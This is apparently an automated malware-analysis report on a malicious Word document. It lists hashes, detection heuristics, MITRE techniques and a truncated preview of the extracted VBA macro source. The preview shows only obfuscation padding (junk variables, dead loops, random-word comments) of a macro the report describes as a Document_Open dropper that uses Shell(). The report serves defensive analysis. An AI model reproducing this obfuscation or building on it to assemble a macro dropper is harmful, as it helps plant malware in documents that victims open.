Office (OLE) malware analysis — malicious · e6071f9205ed8540

MALICIOUS

Office (OLE)

153.5 KB Created: 2016-11-01 17:14:00 Authoring application: Microsoft Office Word First seen: 2019-03-10

MD5: 111945a5ce35ee497c77e89a0dec1574 SHA-1: ee77a01540d931a9d1d920be0ce723b6fbec04b8 SHA-256: e6071f9205ed8540df9612d3f1a001f497931fc76dee43fee1e77750d00df256

260 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro is present and triggers a 'Shell()' call, indicating an attempt to execute arbitrary commands. This is further supported by the 'CreateObject' call and the detection of VBA p-code auto-execution. The primary function of the macros appears to be downloading and executing a second-stage payload, as suggested by the 'Doc.Dropper.Agent' ClamAV detection.

Heuristics 6

ClamAV: Doc.Dropper.Agent-1817555 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-1817555
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 35967 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	35967 bytes
SHA-256: `2f6e6b9bb9a8f630974636b83dc84d4c4b064fe315c1ece2868b704bf71f100a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Function qJPkN() Dim EOQllf As Byte EOQllf = 220 Dim UIGon As Single UIGon = Sgn(45966.318971064) ' Served Dim xfAFWt5 As Integer xfAFWt5 = -24556 Const dCrjEJJ = False ' Interpose brian landward wild Dim MKfiI As Long MKfiI = 0 Dim ZyQpC As Single ZyQpC = Sgn(39594.01857151) ' Accent republicans wild For DyyCIFX = 0 To -3823 Dim OwBpo As Double OwBpo = Sgn(7910.0850055289) ' Differential Dim Hf9Lu As Byte Hf9Lu = 206 Dim TsQp5is As Double TsQp5is = 44384.90769498 Next Dim yFhoTf As Double yFhoTf = 1154.2641720323 Dim ACkDN As Long ACkDN = Sgn(0) Dim vGyzoyE As Long vGyzoyE = Year(Date) End Function Function Tkwss7y(FcBf1) As String Dim O3gd3ygYB As Integer O3gd3ygYB = Sgn(-20091) ' Damnation eradicate swimmer Dim DWRfyhV As Single DWRfyhV = Round(504.455130562) ' Primer palate tcp hustle distillation flaccid amass Const mdY9TUE As Byte = 173 Dim xrWONVzBN As Integer xrWONVzBN = Month(Date) ' Prerogative stumped mortgages Dim YNMiMZKt As Integer Dim llGxoa As Integer llGxoa = Sgn(29636) Dim tI3vflY As Boolean tI3vflY = True ' Caption herbage mother Dim FYonPFWT As Boolean FYonPFWT = True ' Affects adorable tgp downtown cds Dim Tpijl As Boolean Tpijl = True ' Stream ilk Dim LmDYG As Long LmDYG = vbFriday Dim UHEDKm As Single UHEDKm = 9837.1638680484 Const eeuXmY As Boolean = True Dim GIlVIeu0 As Boolean GIlVIeu0 = True ' Wiring cascade deduct casey Const fcUiw As Single = 46399.057405329 ' Grenadier preoccupation shorter drip onslaught For syld1 = 0 To -14596 Dim guySCl guySCl = UCase("Nb") Dim dIzAv As Byte dIzAv = 22 Dim vlfzyy As Integer vlfzyy = Sgn(-17194) ' Intolerance miss jowl intimidate college Dim brjCcO As Long brjCcO = Sgn(-882246386) ' Hw birds his Next syld1 ' Disturbed deeply Dim VR2FdxW As Double VR2FdxW = Fix(26176.72309319) Dim RalhrU As String RalhrU = StrConv("QXWSge6", vbLowerCase) ' Lavishly Const dVxCoflC As Boolean = True Dim ITAjlw9 As String ITAjlw9 = StrConv("q", vbLowerCase) ' Tripe girls For sfoRv = 0 To 27866 Dim ZRtDcJ As Single ZRtDcJ = Round(44411.992182338) ' Checklist powerpoint application Dim eHhjNubKu As Double eHhjNubKu = 64276.257729746 Dim jfZPKz As Integer jfZPKz = Sgn(16067) Dim PmwWnh As Single PmwWnh = Val(2790.713519702) Dim yOEx9LF As Byte yOEx9LF = 33 ' Leopard oasis tokyo albion junction tag Next sfoRv Dim wTuoAL As String Const rWhPwd As Integer = -30269 Dim UMxdRP As Integer UMxdRP = 29834 ' Desultory callous Dim KthZH As Single KthZH = 3096.1054134546 Dim Znrsb As Integer Znrsb = -273 ' Darkness ai Dim n8DFf n8DFf = Year(Date) Dim mZ9pz As Double mZ9pz = Val(33456.438687323) Dim XPRR7 As Boolean XPRR7 = True ' Scenes twelve direction switch variables channel Dim nsGZmMAQ As Integer nsGZmMAQ = Sgn(9358) ' Eerie yeast compendium seats mutter Dim A8E9Q9U As Long A8E9Q9U = Sgn(-2015413552) ' Trends bloggers Dim V3FMmk7 V3FMmk7 = Year(Date) Dim a7fgY As Long Dim VQstT As Boolean VQstT = True ' Considers estate somali Dim kUqTpWqn As Single kUqTpWqn = Sgn(58756.167860263) Const HtGZK As Boolean = True For DgwCOR = 0 To 9749 Dim bQcBzz5wF As Byte bQcBzz5wF = 184 ' Poll vancouver avenger stephanie Dim NYSnFL As Byte NYSnFL = 52 Const XSMJgCm = -1765209700 ' Clammy started assigned mu charger Dim LesIT6 As Byte LesIT6 = 21 Next a7fgY = UBound(FcBf1) Dim TnZiN2 As Single TnZiN2 = Int(62330.478346405) ' Abridged pride Dim ApzSSF As Double ApzSSF = Round(7167.1586690204) ' Booking queenly radically Dim BhBGJ As Single BhBGJ = Sgn(61536.060911872) ' Power armor Dim DAB8xvk As Boolean DAB8xvk = False ' Emotions concord vista Dim Yff0uZ As Single Yff0uZ = Int(3177.3373609631) Dim FA3XrWG FA3XrWG = "QDVvi6O" If Len(FA3XrWG) > 24239 Th ... (truncated)

SHA-256: 2f6e6b9bb9a8f630974636b83dc84d4c4b064fe315c1ece2868b704bf71f100a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function qJPkN()

Dim EOQllf As Byte
EOQllf = 220
Dim UIGon As Single
UIGon = Sgn(45966.318971064)
' Served
Dim xfAFWt5 As Integer
xfAFWt5 = -24556
Const dCrjEJJ = False
' Interpose brian landward wild
Dim MKfiI As Long
MKfiI = 0
Dim ZyQpC As Single
ZyQpC = Sgn(39594.01857151)
' Accent republicans wild
For DyyCIFX = 0 To -3823
Dim OwBpo As Double
OwBpo = Sgn(7910.0850055289)
' Differential
Dim Hf9Lu As Byte
Hf9Lu = 206
Dim TsQp5is As Double
TsQp5is = 44384.90769498
Next
Dim yFhoTf As Double
yFhoTf = 1154.2641720323
Dim ACkDN As Long
ACkDN = Sgn(0)
Dim vGyzoyE As Long
vGyzoyE = Year(Date)
End Function
Function Tkwss7y(FcBf1) As String
Dim O3gd3ygYB As Integer
O3gd3ygYB = Sgn(-20091)
' Damnation eradicate swimmer
Dim DWRfyhV As Single
DWRfyhV = Round(504.455130562)
' Primer palate tcp hustle distillation flaccid amass
Const mdY9TUE As Byte = 173
Dim xrWONVzBN As Integer
xrWONVzBN = Month(Date)
' Prerogative stumped mortgages
Dim YNMiMZKt As Integer
Dim llGxoa As Integer
llGxoa = Sgn(29636)
Dim tI3vflY As Boolean
tI3vflY = True
' Caption herbage mother
Dim FYonPFWT As Boolean
FYonPFWT = True
' Affects adorable tgp downtown cds
Dim Tpijl As Boolean
Tpijl = True
' Stream ilk
Dim LmDYG As Long
LmDYG = vbFriday

Dim UHEDKm As Single
UHEDKm = 9837.1638680484
Const eeuXmY As Boolean = True
Dim GIlVIeu0 As Boolean
GIlVIeu0 = True
' Wiring cascade deduct casey
Const fcUiw As Single = 46399.057405329
' Grenadier preoccupation shorter drip onslaught
For syld1 = 0 To -14596
Dim guySCl
guySCl = UCase("Nb")
Dim dIzAv As Byte
dIzAv = 22
Dim vlfzyy As Integer
vlfzyy = Sgn(-17194)
' Intolerance miss jowl intimidate college
Dim brjCcO As Long
brjCcO = Sgn(-882246386)
' Hw birds his
Next syld1
' Disturbed deeply
Dim VR2FdxW As Double
VR2FdxW = Fix(26176.72309319)
Dim RalhrU As String
RalhrU = StrConv("QXWSge6", vbLowerCase)
' Lavishly
Const dVxCoflC As Boolean = True
Dim ITAjlw9 As String
ITAjlw9 = StrConv("q", vbLowerCase)
' Tripe girls
For sfoRv = 0 To 27866
Dim ZRtDcJ As Single
ZRtDcJ = Round(44411.992182338)
' Checklist powerpoint application
Dim eHhjNubKu As Double
eHhjNubKu = 64276.257729746
Dim jfZPKz As Integer
jfZPKz = Sgn(16067)
Dim PmwWnh As Single
PmwWnh = Val(2790.713519702)
Dim yOEx9LF As Byte
yOEx9LF = 33
' Leopard oasis tokyo albion junction tag
Next sfoRv
Dim wTuoAL As String
Const rWhPwd As Integer = -30269
Dim UMxdRP As Integer
UMxdRP = 29834
' Desultory callous
Dim KthZH As Single
KthZH = 3096.1054134546
Dim Znrsb As Integer
Znrsb = -273
' Darkness ai
Dim n8DFf
n8DFf = Year(Date)
Dim mZ9pz As Double
mZ9pz = Val(33456.438687323)
Dim XPRR7 As Boolean
XPRR7 = True
' Scenes twelve direction switch variables channel
Dim nsGZmMAQ As Integer
nsGZmMAQ = Sgn(9358)
' Eerie yeast compendium seats mutter
Dim A8E9Q9U As Long
A8E9Q9U = Sgn(-2015413552)
' Trends bloggers
Dim V3FMmk7
V3FMmk7 = Year(Date)
Dim a7fgY As Long

Dim VQstT As Boolean
VQstT = True
' Considers estate somali
Dim kUqTpWqn As Single
kUqTpWqn = Sgn(58756.167860263)
Const HtGZK As Boolean = True
For DgwCOR = 0 To 9749

Dim bQcBzz5wF As Byte
bQcBzz5wF = 184
' Poll vancouver avenger stephanie
Dim NYSnFL As Byte
NYSnFL = 52
Const XSMJgCm = -1765209700
' Clammy started assigned mu charger
Dim LesIT6 As Byte
LesIT6 = 21
Next
a7fgY = UBound(FcBf1)
Dim TnZiN2 As Single
TnZiN2 = Int(62330.478346405)
' Abridged pride
Dim ApzSSF As Double
ApzSSF = Round(7167.1586690204)
' Booking queenly radically
Dim BhBGJ As Single
BhBGJ = Sgn(61536.060911872)
' Power armor
Dim DAB8xvk As Boolean
DAB8xvk = False
' Emotions concord vista
Dim Yff0uZ As Single
Yff0uZ = Int(3177.3373609631)
Dim FA3XrWG
FA3XrWG = "QDVvi6O"
If Len(FA3XrWG) > 24239 Th
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.